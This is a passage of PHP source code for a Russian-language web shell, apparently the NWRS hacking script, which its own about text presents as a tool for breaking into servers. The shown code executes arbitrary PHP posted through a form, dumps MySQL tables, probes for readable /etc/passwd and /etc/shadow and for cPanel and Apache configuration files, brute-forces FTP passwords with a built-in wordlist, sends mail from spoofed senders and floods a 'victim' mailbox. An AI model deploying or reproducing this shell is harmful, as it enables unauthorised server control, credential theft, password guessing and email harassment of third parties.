 485     // получаем текст запроса создания структуры таблицы
 486     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
 487     $row   = @mysql_fetch_row($res);
 488     $sql1 .= $row[1]."\r\n\r\n";
 489     $sql1 .= "# ---------------------------------\r\n\r\n";
 490
 491     $sql2 = '';
 492
 493     // получаем данные таблицы
 494     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
 495     if (@mysql_num_rows($res) > 0) {
 496     while ($row = @mysql_fetch_assoc($res)) {
 497     $keys = @implode("`, `", @array_keys($row));
 498     $values = @array_values($row);
 499     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
 500     $values = @implode("', '", $values);
 501     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
 502     }
 503     $sql2 .= "\r\n# ---------------------------------";
 504     }
 505     echo "<center><b>Готово! Дамп прошел удачно!</b></center>";
 506    // пишем в файл или выводим в браузер
 507    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
 508    else { echo $sql1.$sql2; }
 509    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
 510
 511    else echo "Такой БД нет!";
 512   @mysql_close($db);
 513   } // end if($db)
 514  else echo "Нет коннекта c сервером!";
 515 } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
 516 else if(!empty($_POST['dif'])&&!$fp) { echo "ОШИБКА, нет прав записи в файл!"; }
 517
 518break;
 519// SQL Attack
 520case "sql":
 521echo "<form name='mysql_dump' action='?ac=damp' method='post'>";
 522echo "&nbsp;База: &nbsp;<input type=text name=mysql_db size=15 value=";
 523echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
 524echo ">";
 525echo "&nbsp;Таблица: &nbsp;<input type=text name=mysql_tbl size=15 value=";
 526echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
 527echo ">";
 528echo "&nbsp;Логин: &nbsp;<input type=text name=mysql_l size=15 value=";
 529echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
 530echo ">";
 531echo "&nbsp;Пароль: &nbsp;<input type=text name=mysql_p size=15 value=";
 532echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
 533echo ">";
 534echo "<input type=hidden name=dir size=85 value=".$dir.">";
 535echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
 536echo "<br>&nbsp;Сохранить дамп в файле: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
 537echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
 538echo ">";
 539echo "<input type=submit name=submit value=Сохранить>" ;
 540echo "</font>";
 541echo "</form>"; 
 542 print "<tr><td>";
 543###
 544
 545@$php_self=$_GET['PHP_SELF'];
 546@$from=$_GET['from'];
 547@$to=$_GET['to'];
 548@$adress=$_POST['adress'];
 549@$port=$_POST['port'];
 550@$login=$_POST['login'];
 551@$pass=$_POST['pass'];
 552@$adress=$_GET['adress'];
 553@$port=$_GET['port'];
 554@$login=$_GET['login'];
 555@$pass=$_GET['pass'];
 556if(!isset($adress)){$adress="localhost";}
 557if(!isset($login)){$login="root";}
 558if(!isset($pass)){$pass="";}
 559if(!isset($port)){$port="3306";}
 560if(!isset($from)){$from=0;}
 561if(!isset($to)){$to=50;}
 562?>
 563
 564<body vLink=white>
 565<font color=black face=verdana size=1>
 566<form>  <? if(!@$conn){ ?>
 567<table><tr><td valign=top>
 568<input type=hidden name=ac value=sql>
 569<tr><td valign=top>Хост: </tr><td><input name=adress value='<?=$adress?>' size=20></td></tr>
 570<tr><td valign=top>Порт: </tr><td><input name=port value='<?=$port?>' size=6></td></tr>
 571<tr><Td valign=top>Логин: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
 572<tr><Td valign=top>Пароль: </td><td> <input name=pass value='<?=$pass?>' size=10>
 573<input type=hidden name=p value=sql></td></tr>
 574<tr><td></td><td><input type=submit name=conn value=Подключиться></form></td></tr><?}?>
 575<tr><td valign=top><? if(@$conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td>
 576</td></tr>
 577</table>
 578<table width=100%><tr><td>
 579<?
 580@$conn=$_GET['conn'];
 581@$adress=$_GET['adress'];
 582@$port=$_GET['port'];
 583@$login=$_GET['login'];
 584@$pass=$_GET['pass'];
 585if($conn){
 586
 587$serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("ОШИБКА: ".mysql_error());
 588if($serv){$status="Подключен. :: <a href='$php_self?conn=0'>Выйти из базы</a>";}else{$status="Отключен.";}
 589print "<b><font color=green>Статус: $status<br><br>";
 590print "<table cellpadding=0 cellspacing=0><tr><td valign=top>";
 591print "<font color=red>[Таблицы]</font><Br><font color=white>";
 592$res = mysql_list_dbs($serv);
 593while ($str=mysql_fetch_row($res)){
 594print "<b><a href='$php_self?ac=sql&base=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
 595@$tc++;
 596}
 597$pro="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
 598@$base=$_GET['base'];
 599@$db=$_GET['db'];
 600print "<font color=red>[Всего таблиц: $tc]</font><br>$pro";
 601if($base){
 602print "<div align=left><font color=green>Таблица: [$tbl]</div></font><br>";
 603$result=mysql_list_tables($db);
 604while($str=mysql_fetch_array($result)){
 605$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
 606$records=mysql_fetch_array($c);
 607print "<font color=red>[$records[0]]</font> <a href='$php_self?ac=sql&inside=1&p=sql&vn=$str[0]&base=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
 608mysql_free_result($c);
 609}
 610} #end base
 611
 612@$vn=$_GET['vn'];
 613print "</td><td valign=top>";
 614print "<font color=green>База данных: $db => $vn</font>";
 615@$inside=$_GET['inside'];
 616@$tbl=$_GET['tbl'];
 617if($inside){
 618print "<table cellpadding=0 cellspacing=1><tr>";
 619
 620mysql_select_db($db) or die(mysql_error());
 621$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
 622$cfa=mysql_fetch_array($c);
 623mysql_free_result($c);
 624print "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>";
 625print "
 626Всего: $cfa[0]<form>
 627<input type=hidden name=ac value=sql>
 628От: <input name=from size=3 value=0>
 629До: <input name=to size=3 value=$cfa[0]>
 630<input type=submit name=show value=Показать>
 631<input type=hidden name=inside value=1>
 632<input type=hidden name=vn value=$vn>
 633<input type=hidden name=db value=$db>
 634<input type=hidden name=login value=$login>
 635<input type=hidden name=pass value=$pass>
 636<input type=hidden name=adress value=$adress>
 637<input type=hidden name=conn value=1>
 638<input type=hidden name=base value=1>
 639<input type=hidden name=p value=sql>
 640<input type=hidden name=tbl value=$tbl>
 641 [<a href='$php_self?ac=sql&getdb=1&to=$cfa[0]&inside=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&base=1&p=sql&tbl=$tbl'>Загрузить</a>]
 642</form>";
 643@$vn=$_GET['vn'];
 644@$from=$_GET['from'];
 645@$to=$_GET['to'];
 646@$from=$_GET['from'];
 647@$to=$_GET['to'];
 648if(!isset($from)){$from=0;}
 649if(!isset($to)){$to=50;}
 650$query = "SELECT * FROM $vn LIMIT $from,$to";
 651$result = mysql_query($query);
 652for ($i=0;$i<mysql_num_fields($result);$i++){
 653$name=mysql_field_name($result,$i);
 654print "<td>&nbsp;</td><td bgcolor=#BCE0FF> $name </td> ";
 655}
 656print "</tr>";
 657while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
 658print "<tr>";
 659foreach ($mn as $come=>$lee) {
 660$nst_inside=htmlspecialchars($lee);
 661print "<td>&nbsp;</td><td bgcolor=silver>$nst_inside</td>\r\n";
 662} print "</tr>";
 663}
 664mysql_free_result($result);
 665print "</table>";
 666
 667} #end inside
 668print "</td></tr></table>";
 669} # end $conn
 670
 671
 672###   end of sql
 673print "</tr></td></table> </td></tr></table>";
 674print $copyr;
 675die;
 676
 677
 678break;
 679
 680//PHP Eval Code execution
 681case "eval":
 682
 683echo <<<HTML
 684<b>Исполнение php-кода (без "< ?  ? >")</b>
 685<table>
 686<form method="POST" action="$self">
 687<input type="hidden" name="ac" value="eval">
 688<tr>
 689<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
 690</tr>
 691<tr>
 692<td><input type="submit" value="Enter"></td>
 693$tend
 694HTML;
 695
 696if (isset($_POST['ephp'])){
 697eval($_POST['ephp']);
 698}
 699break;
 700
 701// SEND MAIL
 702case "sendmail":
 703echo <<<HTML
 704<table>
 705<form method="POST" action="$self">
 706<input type="hidden" name="ac" value="sendmail">
 707<tr>От кого: <br>
 708<input type="TEXT" name="frommail">
 709<br>Кому:<br> <input type="TEXT" name="tomailz">
 710<br>Тема: <br><input type="TEXT" name="mailtema">
 711<br>Текст: <br>
 712<td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
 713</tr>
 714<tr>
 715<td><input type="submit" value="Отправить" name="submit"></td><form>
 716$tend
 717HTML;
 718// никакая проверка не делается, а зачем ? =)
 719if (isset($submit))
 720{
 721
 722mail($tomailz,$mailtema,$mailtext,"From: $frommail");
 723echo "<h2>Сообщение отправлено!</h2>";
 724}
 725break;
 726
 727
 728// Информация о системе
 729case "info":
 730if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
 731{
 732 $safemode = true;
 733 $hsafemode = "<font color=\"red\">Включено</font>";
 734}
 735else {$safemode = false; $hsafemode = "Отключено</font>";}
 736/* display information */
 737echo "<b>[ Информация о системе ]</b><br>";
 738echo "<b>Хост:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
 739echo "<b>IP сервера:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
 740echo " <b>Сервер: </b>".$_SERVER['SERVER_SIGNATURE']."  ";
 741echo "<b>OC:</b> ".exec("uname -a")."(";
 742print "".php_uname()." )<br>\n";
 743echo "<b>Процессор:</b> ".exec("cat /proc/cpuinfo | grep GHz")."<br>";
 744echo "<b>Привилегии: </b>".exec("id")."<br>";
 745echo "<b>Всего места: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "<b>Свободно</b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB <br>";
 746echo "<b>Текущий каталог:</b>".exec("pwd")."";
 747echo " <br><b>Текуший web-путь: </b>".@$_SERVER['PHP_SELF']."  ";
 748echo "<br><b>Твой IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
 749echo "<b>PHP version: </b>".phpversion()."<BR>";
 750echo "<b> ID владельца процеса: </b>".get_current_user()."<BR>";
 751echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
 752if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
 753print '<b>Есть доступ к /etc/passwd! </b><br>';
 754}
 755if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
 756print '<b>Есть доступ к /etc/shadow!</b> <br>';
 757}
 758if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
 759print '<b>Есть доступ к /etc/shadow-!</b> ';
 760}
 761if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
 762print '<b>Есть доступ к /etc/master.passwd! </b><br>';
 763}
 764if(isset($_POST['th']) && $_POST['th']!=''){
 765chdir($_POST['th']);
 766};
 767if(is_writable('/tmp/')){
 768$fp=fopen('/tmp/qq8',"w+");
 769fclose($fp);
 770print "/tmp - открыта&nbsp;<br>\n";
 771unlink('/tmp/qq8');
 772}
 773else{
 774print "<font color=red>/tmp - не открыта</font><br>";
 775}
 776echo "<b>Безопасный режим: ".$hsafemode."</b><br>";
 777if ($nixpasswd)
 778  {
 779   if ($nixpasswd == 1) {$nixpasswd = 0;}
 780   $num = $nixpasswd + $nixpwdperpage;
 781   echo "<b>*nix /etc/passwd:</b><br>";
 782   $i = $nixpasswd;
 783   while ($i < $num)
 784   {
 785    $uid = posix_getpwuid($i);
 786    if ($uid) {echo join(":",$uid)."<br>";}
 787    $i++;
 788   }
 789  }
 790  else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
 791  if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
 792  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
 793  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
 794  { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
 795   if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
 796    if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log  </b></u></a></b><br>";}
 797 break;
 798 
 799// О скрипте
 800case "about":
 801
 802echo "<center><b>Привет всем!</b><br><br>
 803Наконец-то NWRS доступен в первой стабильной версии! Добавилось множество новых полезных возможностей. Все функции скрипта работают и работают корректно. Добавлены уникальные инструменты для взлома сервера. В то же время нет ничего лишнего. Все, что задумывалось - реализировано. Думаю, каждый найдет в скрипте что-то полезное для себя. Также заявляю о том, что я закрываю проект, ибо он достиг идеала :) Любой может его продолжить, php - открытый язык. На первых порах скрипт вообще был только у нескольких человек узкого круга друзей, писал его для себя, из-за своей природной лени.
 804Ну, и спасибо этим людям:  Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (орфография и дизайн)... И многим другим... Их идеи очень помогли воплотить в жизнь столь универсальный инструмент. Огромное спасибо им!<br><br><b>Помните: используя этот скрипт на чужих серверах, вы нарушаете закон :) Так что осторожнее.</b></center>";
 805echo "<center><br><br><em>Посетите эти сайты, и вы всегда будете в курсе событий:</em><br><br>
 806<a href='http://www.ru24-team.net'>www.ru24-team.net</a><br><br>
 807<a href='http://www.web-hack.ru'>www.web-hack.ru</a><br><br>
 808<a href='http://www.rst.void.ru'>www.rst.void.ru</a><br><br>
 809<a href='http://www.hackru.info'>www.hackru.info</a><br><br>
 810<a href='http://www.realcoding.net'>www.realcoding.net</a><br><br>
 811<a href='http://www.ccteam.ru'>www.ccteam.ru</a><br><br>
 812Извиняюсь, если кого забыл.<br> <em>Автор не несет ответственности за материалы, размещенные на этих сайтах, оcобенно на последнем </em>:)
 813<br><br><br><br><br><b>Скрипт распространяется по лицензии GNU GPL<br> 22 Июля 2005 г. &#169; DreAmeRz<br> e-mail:</b> <a href='mailto:dreamerz@mail.ru'>dreamerz@mail.ru</a><b> ICQ: </b>817312 <b>WEB: </b><a href='http://www.ru24-team.net'>http://www.Ru24-Team.NET</a>";
 814break;
 815
 816// ФТП подбор паролей
 817case "ftppass":
 818
 819$filename="/etc/passwd"; // passwd file
 820$ftp_server="localhost"; // FTP-server
 821
 822echo "FTP-server: <b>$ftp_server</b> <br><br>";
 823
 824$fp = fopen ($filename, "r");
 825if ($fp)
 826{
 827while (!feof ($fp)) { 
 828$buf = fgets($fp, 100);
 829ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
 830$ftp_user_name=$g[1];
 831$ftp_user_pass=$g[1];
 832$conn_id=ftp_connect($ftp_server);
 833$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
 834
 835if (($conn_id) && ($login_result)) {
 836echo "<b>Подключение login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
 837ftp_close($conn_id);}
 838else {
 839echo $ftp_user_name." - error<br>";
 840}
 841}}
 842break;
 843
 844case "ftp":
 845
 846echo "
 847 <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
 848 <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
 849 <b><a href=?ac=ftppass>Проверить на связку login\password</a></b>
 850</td></tr>
 851 
 852<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTP Host:</td>
 853<td align=left width=350>&nbsp;&nbsp;&nbsp;
 854<input class='inputbox' type='text' name='host' size=50></td></tr>
 855<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
 856<td align=left width=350>&nbsp;&nbsp;&nbsp;
 857<input class='inputbox' type='text' name='login' size=50></td></tr>
 858<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Колличество паролей:</td>
 859<td align=left width=350>&nbsp;&nbsp;&nbsp;
 860<input class='inputbox' type='text' name='number' size=10> <1000 pass </td></tr>
 861<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Пароль для проверки:</td>
 862<td align=left width=350>&nbsp;&nbsp;&nbsp;
 863<input class='inputbox' type='text' name='testing' size=50>
 864<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Лог сохраняется в pass.txt</b></td></tr>
 865
 866
 867 
 868 </form></table>";
 869 
 870 
 871function s() {
 872   $word="qwrtypsdfghjklzxcvbnm";
 873   return $word[mt_rand(0,strlen($word)-1)];
 874}
 875
 876function g() {
 877   $word="euioam";
 878   return $word[mt_rand(0,strlen($word)-2)];
 879}
 880
 881function name0() {   return s().g().s();                        }
 882function name1() {   return s().g().s().g();                    }
 883function name2() {   return s().g().g().s();                    }
 884function name3() {   return s().s().g().s().g();                }
 885function name4() {   return g().s().g().s().g();                }
 886function name5() {   return g().g().s().g().s();                }
 887function name6() {   return g().s().s().g().s();                }
 888function name7() {   return s().g().g().s().g();                }
 889function name8() {   return s().g().s().g().g();                }
 890function name9() {   return s().g().s().g().s().g();            }
 891function name10() {   return s().g().s().s().g().s().s();        }
 892function name11() {   return s().g().s().s().g().s().s().g();        }
 893
 894$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
 895$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
 896
 897function randword() {
 898   global $cool;
 899   $func="name".mt_rand(0,11);
 900   $func2="name".mt_rand(0,11);
 901   switch (mt_rand(0,11)) {
 902      case 0: return $func().mt_rand(5,99);
 903      case 1: return $func()."-".$func2();
 904      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
 905      case 3: return $func()."!".$func();
 906      case 4: return randpass(mt_rand(5,12));
 907      default: return $func();
 908   }
 909 
 910 
 911}
 912
 913function randpass($len) {
 914   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
 915   $s="";
 916   for ($i=0; $i<$len; $i++) {
 917      $s.=$word[mt_rand(0,strlen($word)-1)];
 918   }
 919   return $s;
 920}
 921if (@unlink("pass.txt") < 0){
 922echo "ничего нет";
 923exit;
 924}
 925$file="pass.txt"; 
 926if($file && $host && $login){
 927   $cn=mt_rand(30,30);
 928for ($i=0; $i<$cn; $i++) {
 929   $s=$cool2[$i];
 930   $f=@fopen(pass.".txt","a+");
 931   fputs($f,"$s\n");
 932   }
 933 
 934  $cnt2=mt_rand(43,43);
 935for ($i=0; $i<$cnt2; $i++) {
 936   $r=$cool[$i];
 937   $f=@fopen(pass.".txt","a+");
 938   fputs($f,"$login$r\n");
 939}    
 940$p="$testing";
 941   $f=@fopen(pass.".txt","a+");
 942   fputs($f,"$p\n");
 943   
 944 $cnt3=mt_rand($number,$number);
 945   for ($i=0; $i<$cnt3; $i++) {
 946   $u=randword();
 947   $f=@fopen(pass.".txt","a+");
 948   fputs($f,"$u\n");
 949  } 
 950  
 951  if(is_file($file)){
 952 $passwd=file($file,1000);
 953  for($i=0; $i<count($passwd); $i++){
 954   $stop=false;
 955   $password=trim($passwd[$i]);
 956   $open_ftp=@fsockopen($host,21);
 957    if($open_ftp!=false){
 958     fputs($open_ftp,"user $login\n");
 959     fputs($open_ftp,"pass $password\n");
 960     while(!feof($open_ftp) && $stop!=true){
 961      $text=fgets($open_ftp,4096);
 962      if(preg_match("/230/",$text)){
 963       $stop=true;
 964	   $f=@fopen($host._ftp,"a+");
 965       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
 966
 967       echo "
 968	   	<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
 969<tr><td align=center class=pagetitle><b><font color=\"blue\">Поздравляю!!! Пароль подобран.</font></b><br>
 970&nbsp;&nbsp;Коннект: <b>$host</b><br>&nbsp;&nbsp;Логин: <b>$login</b><br>&nbsp;&nbsp;Пароль: <b>$password</b></td></tr></table>
 971";exit;
 972      }
 973      elseif(preg_match("/530/",$text)){
 974       $stop=true;
 975      
 976      }
 977     }
 978     fclose($open_ftp);
 979   }else{
 980    echo "
 981	<TABLE CELLPADDING=0 CELLSPACING=0  width=500 align=center>
 982<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Неверно указан ftp хостинга!!! На <b><u>$host</u></b> закрыт 21 порт!</b></b></td></tr>
 983</table>
 984";exit;
 985   }
 986  }
 987 }
 988}
 989
 990
 991break;
 992// SQL Attack
 993case "sql":
 994
 995break;
 996
 997
 998
 999
1000
1001
1002// MailFlud
1003case "mailfluder":
1004
1005$email=$_POST['email']; // Мыло жертвы
1006$from=$_POST['from']; // Мыло жертвы
1007$num=$_POST['num']; // Число писем
1008$text=$_POST['text']; // Текст флуда
1009$kb=$_POST['kb']; // Вес письма (kb)
1010?>
1011<script language="JavaScript"><!--
1012function reset_form() {
1013document.forms[0].elements[0].value="";
1014document.forms[0].elements[1].value="";
1015document.forms[0].elements[2].value="";
1016document.forms[0].elements[3].value="";
1017document.forms[0].elements[4].value="";
1018}
1019//--></script>
1020<?php
1021if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
1022
1023$num_text=strlen($text)+1; // Определяет длину текста + 1 (пробел в конце)
1024$num_kb=(1024/$num_text)*$kb;
1025$num_kb=ceil($num_kb);
1026
1027for ($i=1; $i<=$num_kb; $i++) {
1028$msg=$msg.$text." ";
1029}
1030
1031for ($i=1; $i<=$num; $i++) {
1032mail($email, $text, $msg, "From: $from");
1033}
1034
1035$all_kb=$num*$kb;
1036
1037echo <<<EOF
1038<p align="center">Жертва: <b>$email</b><br>
1039Кол-во писем: <b>$num</b><br>
1040Общий посланный объем: <b>$all_kb kb</b><br></p>
1041EOF;
1042
1043}
1044
1045else {
1046
1047echo <<<EOF
1048<form action="?ac=mailfluder" method="post">
1049<table align="center" border="0" bordercolor="#000000">
1050<tr><td>Мыло жертвы</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
1051<tr><td>От липового мыла</td><td><input type="text" name="from" value="support@mail.com" size="25"></td></tr>
1052<tr><td>Число писем</td><td><input type="text" name="num" value="5" size="25"></td></tr>
1053<tr><td>Текст флуда</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
1054<tr><td>Вес письма (KB)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
1055<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
1056</table>
1057</form>…

Large files files are truncated, but you can click here to view the full file